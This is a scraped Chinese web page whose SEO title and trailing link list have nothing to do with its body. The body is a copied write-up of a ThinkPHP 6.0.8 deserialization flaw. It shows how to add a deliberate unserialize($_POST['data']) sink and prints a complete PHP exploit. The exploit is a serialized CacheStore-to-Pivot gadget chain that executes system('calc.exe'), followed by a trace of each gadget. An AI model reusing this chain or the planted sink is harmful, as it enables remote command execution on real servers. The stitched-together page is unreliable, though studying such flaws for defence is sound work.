当前位置: 首页 > news >正文

什么是响应式网站建设国际网站建设的目的

news 2025/12/27 7:44:05
什么是响应式网站建设,国际网站建设的目的,宁乡县建设局网站,wordpress极简漏洞说明 1. 漏洞原理#xff1a;ThinkPHP 6.0.8 CacheStore 会触发POP利用链子#xff0c;造成任意命令执行 2. 组件描述#xff1a; ThinkPHP是一个免费开源的#xff0c;快速、简单的面向对象的轻量级PHP开发框架 3. 影响版本#xff1a;V6.0.8 漏洞复现 1. 环境安…漏洞说明 1. 漏洞原理ThinkPHP 6.0.8 CacheStore 会触发POP利用链子造成任意命令执行 2. 组件描述 ThinkPHP是一个免费开源的快速、简单的面向对象的轻量级PHP开发框架 3. 影响版本V6.0.8 漏洞复现 1. 环境安装ThinkPHP6.0正式完整版下载_其他_技术博文_js代码 下载v6.0.8使用命令php think run即环境起来了 访问127.0.0.1:8000 需要在源代码中加入一个入口 if(isset($_POST[data])) {unserialize($_POST[data]); } highlight_string(file_get_contents(__FILE__)); 利用exp生成payload并打入data入口 ?phpnamespace League\Flysystem\Cached\Storage {abstract class AbstractCache{protected $autosave;public function __construct(){$this-autosave false;}} }namespace think\filesystem {use League\Flysystem\Cached\Storage\AbstractCache;use think\cache\driver\File;class CacheStore extends AbstractCache{protected $store;protected $expire;protected $key;public function __construct(){$this-store new File();$this-expire 1;$this-key 1;}}echo urlencode(serialize(new CacheStore())); }namespace think\cache {use think\model\Pivot;abstract class Driver{protected $options [expire 0,cache_subdir true,prefix ,path ,hash_type md5,data_compress false,tag_prefix tag:,serialize [system],];public function __construct(){$this-options [expire 0,cache_subdir true,prefix ,path new Pivot(),hash_type md5,data_compress false,tag_prefix tag:,serialize [system],];}} }namespace think\cache\driver {use think\cache\Driver;class File extends Driver{} }namespace think {use think\model\concern\Attribute;abstract class Model{private $data [];private $withAttr [];public function __construct(){$this-data [errorr0 calc.exe];$this-visible [errorr0 1];$this-withAttr [errorr0 system];}} }namespace think\model\concern {trait Attribute{} }namespace think\model {use think\Model;class Pivot extends Model{} } 漏洞分析 全局搜索找到CacheStore所在位置src/think/filesystem/CacheStore.php 找到它的父类AbstractCache查看发现有__destruct() 步入save查看 跟进查看getForStorage() 没有发现可利用点步出看save后面的 $this-store-set($this-key, $contents, $this-expire); 这里$this-store是可控的所以可以调用任意含义set()函数的对象这里调用src/think/cache/driver/File.php::set 跟进getExpireTime()查看如下 没有可利用点步出继续往下步入getCacheKey()查看 前面使用了hash()函数第一个为hash类型的设置如果为空或者设置有误则会报错我们需要保证上面不截断的前提下执行下面return的步骤return中$this-options[path]与$name进行了拼接而$this-options[path]是可控的如果实例化一个有__toString()魔术方法的对象保证$name不报错则可以搭成一个链经过查找发现vendor\topthink\think-orm\src\model\concern\Conversion有__toString可以利用 步入toArray()查看情况 这里看到如果满足条件判断则可以执行getAttr()步入查看 不出错就应该进入getData() 没什么特别的直接看外层的getValue() 这里可以构造一个自定义函数以及利用data传参达到任意命令执行而有个问题就是触发了漏洞怎么将他们链接起来并且还有一个问题就是恶意payload如何传入这里经过审计发现需要传入的恶意$data参数是vendor\topthink\think-orm\src\model\concern\Attribute中而在vendor\topthink\think-orm\src\Model可控制$data并且 Model复用了Conversion的内容这样也可以触发__toString最后构造就按照分析的将几个类复用再给几个类中特殊需要赋值即可还有一个小问题就是如上图Model是抽象类因此我们需要自己手写一个子类继承即可。 Referer tp6.0.8反序列化漏洞分析 - 网安 thinkphp6.0x反序列化复现及再挖掘-安全客 - 安全资讯平台
http://www.w-s-a.com/news/693608/

相关文章:

  • 网站域名续费多少钱在线制作图片软件
  • 济南城乡住房建设厅网站中国会议营销网站
  • 展示类网站cms网站seo方法
  • 莒县做网站的公司设计师网站模版
  • 顺德顺的网站建设备份的网站建设方案书
  • 如何做网站广告山东电商网站建设
  • 新手建什么网站赚钱吗WordPress搜狗不收录
  • 石家庄招聘哪个网站做的好网站设计建设公司服务商
  • 建设公司网站大概需要多少钱建站平台和网站开发的区别
  • 淄川区住房和城乡建设局网站门户网站模板源码下载
  • 室内设计公司 网站建设建站塔山双喜
  • 网站建设属于什么经营范围销售网站开发业务
  • 企业建站系统平台优秀网站作品截图
  • 杭州品牌网站制作wordpress多域名移动主题
  • 北京网站网站建设icp备案 网站备案
  • 长春网站公司哪家好电子商务网站建设作文
  • 网站开发php程序员网上店铺怎么运营
  • mip网站怎么做匹配h5婚纱摄影网站模板
  • 怎么注册建设公司网站域名历史价格查询
  • 爱站网seo工具包互联网软件开发工程师
  • 百度站长工具平台登录郑州seo规则
  • 财税公司做网站精品建站教程
  • 建设区块链网站区块链开发平台有哪些
  • 青年人爱看的网站ie显示wordpress网页不完整
  • 优惠券推广网站怎么做青岛正规网站建设哪家便宜
  • 怎么搞一个服务器建设网站wordpress页眉编辑
  • 计算机企业网站建设论文流量平台是什么意思
  • 成都建设网站公司哪家好上海有名的广告公司
  • 收录优美图片找不到了整站seo优化一般多少钱
  • 大型网站建设哪家好汉川网页设计